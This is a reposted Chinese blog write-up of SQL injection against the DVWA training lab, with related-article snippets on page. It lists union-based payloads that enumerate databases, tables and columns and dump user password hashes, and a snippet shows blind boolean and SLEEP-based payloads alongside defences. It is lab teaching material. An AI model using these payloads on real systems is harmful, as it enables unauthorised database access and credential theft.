DVWA —— SQL Injection分析

最新推荐文章于 2025-09-11 23:21:03 发布

转载最新推荐文章于 2025-09-11 23:21:03 发布 · 76 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/Loong716/p/9919742.html

文章标签：

#php #数据库

本文详细介绍在DVWA平台上进行SQL注入攻击的实战过程，包括Low、Medium、High及Impossible四个难度级别的具体操作步骤，从数据库名、表名到列名及数据的获取，深入剖析不同防护级别下的注入技巧。

一.Low

1.Low等级的php代码

发现没有任何防御

2.直接order by

order by 3时错误

order by 2时正确

3.查询数据库

'union select database(),2#

得到数据库名为dvwa

4.查询表名

'union select table_name,2 from information_schema.tables where table_schema=0x64767761#

4.查询users下的列名

'union select column_name,2 from information_schema.columns where table_name=0x7573657273#

5.查询user，password的数据

'union select user,password from users#

二.Medium

1.Medium下的php代码

发现调用了mysqli_real_escape_string()，过滤掉了以下字符：\x00 \n \r \ ' " \x1a

并把输入框改为了下拉选择

2.抓包尝试数字型注入

sql语句与Low等级下基本相同，需要去掉引号

仍然先ordey by，发现为2时正确

3.获取数据库名

4.表名

5.列名

6.列名下数据

三.High

1.High等级时php代码

与medium对比，仅是在sql语句中添加了LIMIT，想要只返回一个数据，注入时可以注释掉LIMIT

注入语句与Low等级时相同

四.Impossible

代码如下

发现首先使用了一个利用token防csrf的技术，之后检查输入id是否为数字型，之后还采用了PDO，最终结果唯一时才会回显。

转载于:https://www.cnblogs.com/Loong716/p/9919742.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30412013

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

DVWA —— SQL Injection SQL 注入

YouTheFreedom的博客

05-23

439

Web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行，导致参数中的特殊字符打破了SQL语句原有逻辑，黑客可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

dvwa7——SQL Injection

2403_88102829的博客

06-03

638

f12打开hackbar一：判断注入类型输入id=1'报错闭合单引号，页面恢复正常所以为单引号字符型二：开始攻击1.判断列数到3的时候开始报错，所以一共两列2.爆回显位置3.爆数据库名和版本号4.爆表名5.爆库名（2）users。

参与评论您还未登录，请先登录后发表或查看评论

DVWA —— SQL Injection (Blind) SQL 盲注

YouTheFreedom的博客

05-24

423

在 SQL 注入攻击过程中，服务器关闭了错误回显，我们单纯通过服务器返回内容的变化来判断是否存在 SQL 注入和利用的方式。盲注的手段有三种

DVWA靶场通关——SQL Injection篇

m0_74824865的博客

02-10

1102

该PHP代码的主要功能是根据用户提供的id参数，从数据库中查询对应的用户信息（包括first_name和last_name），并将查询结果显示给用户。该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name，并将结果显示给用户。_POST数组中获取，但在传递给SQL查询之前，使用mysqli_real_escape_string函数对其进行了转义处理，从而减少了SQL注入的风险。它不仅简化了数据库操作，还提供了安全的机制来防止SQL注入和其他潜在的安全问题。

DVWA——SQL注入

m0_74426634的博客

04-07

1571

日前，国内最大的程序员社区优快云网站的用户数据库被黑客公开发布，600万用户的登录名及密码被公开泄露，随后又有多家网站的用户密码被流传于网络，连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点，这也恰恰触动了每一位用户的神经，由于设计的漏洞导致了不可收拾的恶果，验证了一句话“出来混的，迟早是要还的”，所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过，如果没有了解或完全没有听过也没有关系，因为接下来我们将介绍SQL Inj

DVWA——SQL Injection

Fly_Mojito的博客

02-02

232

DVWA——SQL Injection

DVWA——SQL Injection(LOW)

qq_54448882的博客

11-05

3434

此文章仅供学习使用，请勿用作违法行为。目录注入的前提条件基本思路 1.判断是否存在注入点，以及注入的类型（字符型/数字型） 2.猜解SQL查询语句中的字段数和字段顺序 3.确定回显点 4.获取当前数据库 5.获取数据库中的表 6.获取表中字段名 7.获取字段中的数据（此时已可以成功获取数据库内容）注入的前提条件：参数用户可控：用户可以控制前端传入后端的参数内容参数可带入数据库进行查询：用户传入的参数可以直接拼接到数据库的SQL语句，且带入数据库查询。基本思路：

DVWA——SQL注入+盲注

qq_58553228的博客

06-02

2322

目的：执行特定sql语句，获得其他相关内容。攻击方式：动态构造SQL语句影响：数据库的脱裤、修改、甚至影响到操作系统。

dvwa——sql注入

GZY0601的博客

09-16

770

Hello！转眼一看距离我上次发文章都是一年前的事情了，中职的第三年都一直备赛的路上，一次比了三个项目，搞得学的好乱，现在上了大学，开始回来复习安全的东西，说实话好久没练了很多基本的东西都忘记了，去年就一直说要写dvwa的教程，现在刚好算是可以边复习边更新。哈哈哈哈哈哈！SQL注入是一种常见的网络安全漏洞和攻击方式，它利用应用程序对用户输入数据的处理不当，使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码，攻击者可以执行未经授权的数据库操作，获取敏感信息、篡改数据甚至完全破坏数据库。

DVWA——SQL Injection(Blind)【详细的步骤实现（图解）包含多种盲注方法并且附上了payload】

weixin_46709219的博客

01-04

927

一）区别： SQL盲注与一般注入的区别在于一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。二）思想：在盲注中，页面无论对错都只会以 “是” 或者 “不是”来对我们的SQL语句进行结果的反馈，因此我们需要构造payload去询问例如“数据库名字的第一个字母是不是a？”，通过问答的方式最终获取我们想要的数据。三）盲注分为基于布尔盲注、基于

物联网领域中PHP框架的最佳选择有哪些？

09-11

581

物联网（IoT）作为近年来快速发展的技术领域，已经渗透到智能家居、工业自动化、智慧城市等方方面面。作为Web开发中广泛使用的语言，PHP凭借其易学易用、开发效率高和生态丰富的特点，也在物联网领域找到了用武之地。本文将为大家介绍几款适用于物联网领域的PHP框架，帮助你在下一个IoT项目中做出明智的技术选择。

浮动交易策略

2401_84919512的博客

09-08

218

浮动交易系统（Acme F）分为两个分支：突破系统（FB）和回调系统（FP），两者都基于浮动通道和浮动百分比的概念。- 核心思路：当股价接近浮动通道的上轨（预示多头趋势）或下轨（预示空头趋势），并且在盘整后，结合浮动百分比和特定表格形态（如连续几根柱状图的高点或低点相近），判断突破的有效性。- 突破系统（FB）：当股价接近浮动通道上轨（多头）或下轨（空头）且在盘整后，结合浮动百分比和特定表格形态（连续几根柱状图高点或低点相近），判断突破有效性。结合浮动百分比和股价趋势，交易者需灵活应对突破后的快速反转。

CentOS7下Ceph集群部署实战

2503_91960880的博客

09-09

1058

通过 CRUSH 算法将其映射到不同的 OSD 节点上，实现数据的存储。我们可以将其理解为 Ceph 存储上划分的逻辑分区，Pool 由多个 PG 组成；2、集群网络（cluster-network，用于集群内部通讯）与公共网络（public-network，用于外部访问Ceph集群）分离。Ceph 客户端向 monitor 请求集群的状态，并向 Pool 中写入数据，数据根据 PGs 的数量，3、mon、mds 与 osd 分离部署在不同主机上（测试环境中可以让一台主机节点运行多个组件）

ctfshow_web13-----------文件上传.user.ini

hello_mszcc的博客

09-11

185

猜测flag就在903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php文件下了。经尝试，改后缀php5,ptml均不行，使用.htaccess文件也不成功。正则过滤了php，文件大小<24,文件名小于9。扫描后发现存在upload.php.bak。又是菜鸡的一天，周五没有课，爽爽爽！上传.user.ini，在文件中写上。然后用蚁剑连接，发现可以连接不能操作。打开题目发现是一个文件上传题。,所有文件都可以包含它。

Docker网络模式解析

m0_73596588的博客

09-08

566

Docker的强大之处不仅在于其容器化技术，还在于其灵活的网络架构。Docker提供了四种不同的网络模式，每种模式都适用于不同的使用场景。了解这些网络模式的工作原理和适用场景，对于构建安全、高效的容器化应用至关重要。

ctfshow_web14------（PHP+switch case 穿透+SQL注入+文件读取）

最新发布

hello_mszcc的博客

09-11

201

过滤的关键词有information_schema.tables，information_schema.columns，linestring，空格，polygon。Wappalyzer 识别到 Nginx，网站默认根目录：/var/www/html/。解释：$c = intval($_GET['c']);进入here_1s_your_f1ag.php是一个查询页面，sql注入。要权限，用user()看一下权限是root可以用load_file()读。mysql提供了读取本地文件的函数load_file()

ThinkPHP8学习篇(六)：数据库(二)

zorro_z的博客

09-11

577

在数据库操作环节，查询表达式是描述查询条件的核心工具，而链式操作则为复杂查询逻辑的构建提供了流畅且高效的实现方式，二者共同构成了灵活处理数据查询需求的关键支撑。本篇作为数据库系列文章的第二篇，学习核心内容将集中在各类查询表达式（如比较、逻辑、区间等）的语法与应用，以及 ThinkPHP 中常用的链式操作方法（如 where、order、limit 等）的组合使用上。本篇文章将记录 ThinkPHP 数据库查询表达式与链式操作方法的学习过程。

零基础快速了解掌握Linux防火墙-Iptables

uname_xuan的博客

09-11

604

本文详细介绍了Linux防火墙工具iptables的配置与管理。文章首先概述了iptables的特点和核心组成（表、链、规则），然后重点讲解了配置方法：包括添加/删除规则、查看/修改策略、匹配条件设置等。特别介绍了NAT地址转换配置（SNAT和DNAT）以及防火墙策略的备份恢复方法。全文通过命令示例和流程说明，全面展示了iptables的灵活配置能力，适合作为Linux网络安全管理者的参考手册。

PHP弱类型比较在CTF比赛中的深入分析与实战应用

Liu_Bruce的博客

09-11

965

PHP弱类型比较在CTF比赛中既是常见考点也是安全漏洞来源。本文分析了PHP松散比较(==)与严格比较(===)的区别，揭示了字符串转数字等类型转换规则。重点探讨了CTF中的常见利用场景：哈希比较绕过（使用数组或魔法哈希）、身份验证绕过和JSON解码漏洞。文章提供了高级利用技巧如数组比较、十六进制转换绕过，并给出防御建议：使用严格比较、显式类型转换和输入验证。最后通过实战案例展示了数组绕过和魔法哈希的具体应用，总结了PHP弱类型比较的核心要点和常用Payload。掌握这些知识对CTF比赛和PHP安全开发都至

DVWA靶场SQL Injection （Blind） SQL注入

09-11

### SQL Injection （Blind）简介 SQL Injection （Blind）即 SQL 盲注，是一种特殊的 SQL 注入攻击方式。在这种攻击中，攻击者无法直接从应用程序的响应中获取 SQL 查询的结果，而是通过构造特殊的 SQL 语句，根据应用程序返回的不同响应（如页面响应时间、页面显示内容的变化等）来推断数据库中的信息。 ### 攻击方法 #### 基于布尔的盲注攻击者通过构造 SQL 语句，使数据库根据条件返回不同的结果，通过判断应用程序的响应来确定条件是否成立，逐步获取数据库信息。例如，在登录框输入用户名 `' AND 1=1 --` 和 `' AND 1=2 --`，如果前者登录成功而后者失败，说明存在 SQL 盲注漏洞，且数据库能够正确处理 `1=1` 这个条件。 #### 基于时间的盲注当应用程序对所有 SQL 查询的响应都是相同的，无法通过布尔判断时，攻击者可以利用数据库的延时函数，通过判断应用程序的响应时间来推断信息。例如，构造 SQL 语句 `' AND SLEEP(5) --`，如果应用程序响应时间明显增加了 5 秒，就说明存在 SQL 盲注漏洞。 ### 防护措施 #### 输入验证对用户输入的数据进行严格的验证和过滤，只允许合法的字符和格式。例如，对于数字类型的输入，只允许输入数字字符；对于字符串类型的输入，去除特殊字符和 SQL 关键字。 ```python import re def validate_input(input_data): # 只允许字母和数字 pattern = re.compile(r'^[a-zA-Z0-9]+$') if pattern.match(input_data): return True return False ``` #### 使用参数化查询使用数据库提供的参数化查询功能，将用户输入的数据作为参数传递给 SQL 语句，而不是直接拼接在 SQL 语句中。这样可以防止 SQL 注入攻击，因为数据库会自动处理参数的转义。例如，在 Python 中使用 `sqlite3` 进行参数化查询： ```python import sqlite3 conn = sqlite3.connect('example.db') cursor = conn.cursor() username = "test' OR '1'='1" password = "password" # 使用参数化查询 cursor.execute("SELECT * FROM users WHERE username =? AND password =?", (username, password)) result = cursor.fetchone() ``` #### 最小化数据库权限为应用程序分配最小的数据库权限，只允许其执行必要的操作。例如，如果应用程序只需要查询数据，就不授予其插入、更新和删除数据的权限。 ### 案例假设存在一个简单的用户信息查询页面，用户可以通过输入用户 ID 来查询用户信息。页面的 SQL 查询语句如下： ```sql SELECT * FROM users WHERE id = '$id'; ``` 攻击者可以构造如下的 SQL 盲注语句来获取数据库信息： - 基于布尔的盲注：输入 `1' AND (SELECT COUNT(*) FROM users) > 10 --`，如果页面显示正常，说明用户表中的记录数大于 10；如果页面报错或显示异常，说明记录数小于等于 10。 - 基于时间的盲注：输入 `1' AND SLEEP(5) --`，如果页面响应时间明显增加了 5 秒，说明存在 SQL 盲注漏洞。